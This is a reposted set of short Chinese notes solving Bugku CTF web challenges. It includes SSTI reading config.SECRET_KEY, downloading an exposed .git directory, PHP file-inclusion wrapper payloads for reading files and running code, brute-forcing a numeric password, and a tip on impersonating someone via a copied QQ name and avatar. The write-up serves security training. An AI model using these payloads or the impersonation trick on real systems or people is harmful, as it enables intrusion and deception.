| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> PHP知识库 -> Bugku CTF -> 正文阅读 |
|
[PHP知识库]Bugku CTF |
一、Simple_SSTI_1 在URL使用get函数,然后提交flag{{}},{{}}括号中包括config.SECRET_KEY 二、头等舱 Bp发送到repeater然后send看返回包 三、Source Dirsearch 扫目录 wget -r http://114.67.246.176:10491/.git 递归下载该网站目录下的文件及文件夹 git reflog 查看执行的命令日志 git show e0b8e8e 使用git show commit_id 命令查看commit,标黄色的是commit——id 四、社工-伪造 用相同的qq名字和头像跟小妹说ctf即可 五、源代码 将三段变量url解码然后拼接在一起 67d709b2b54aa2aa648cf6e87a7114f1提交后得到flag 六、文件包含 伪协议 ?file=php://filter/read=convert.base64-encode/resource=xxx.php 伪协议常用的payload,包括读文件和php代码执行 1.?file=data:text/plain,<?php phpinfo()> 2.?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4= 3.?file=php://input [POST DATA:] 4.?file=php://filter/read=convert.base64-encode/resource=xxx.php 七、好像需要密码 Bp爆破5位数 数字 八、备份是个好习惯 1.PHP ini_set用来设置php.ini的值,在函数执行的时候生效 2.strstr(str1,str2) 函数用于判断字符串str2是否是str1的子串。如果是,则该函数返回 str1字符串从 str2第一次出现的位置开始到 str1结尾的字符串;否则,返回NULL。 3.$_SERVER['REQUEST_URI'] //URL 4.substr — 返回字符串的子串 substr(string $string, int $start, int $length?= ?) 把字符串 "Hello world!" 中的字符 "world" 替换为 "Shanghai": <?php echo str_replace("world","Shanghai","Hello world!"); ?> 5.parse_str() 函数把查询字符串解析到变量中。 存储变量到一个数组中: <?php 九、No one knows regex better than me Zero是flag的base64编码 $end=substr($third,5); End变量等于从third的第五位开始到最后 \056\160\150\x70为16进制和8进制ascii代码,php可自动识别 |
|
PHP知识库 最新文章 |
Laravel 下实现 Google 2fa 验证 |
UUCTF WP |
DASCTF10月 web |
XAMPP任意命令执行提升权限漏洞(CVE-2020- |
[GYCTF2020]Easyphp |
iwebsec靶场 代码执行关卡通关笔记 |
多个线程同步执行,多个线程依次执行,多个 |
php 没事记录下常用方法 (TP5.1) |
php之jwt |
2021-09-18 |
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 | -2024/11/26 2:54:18- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |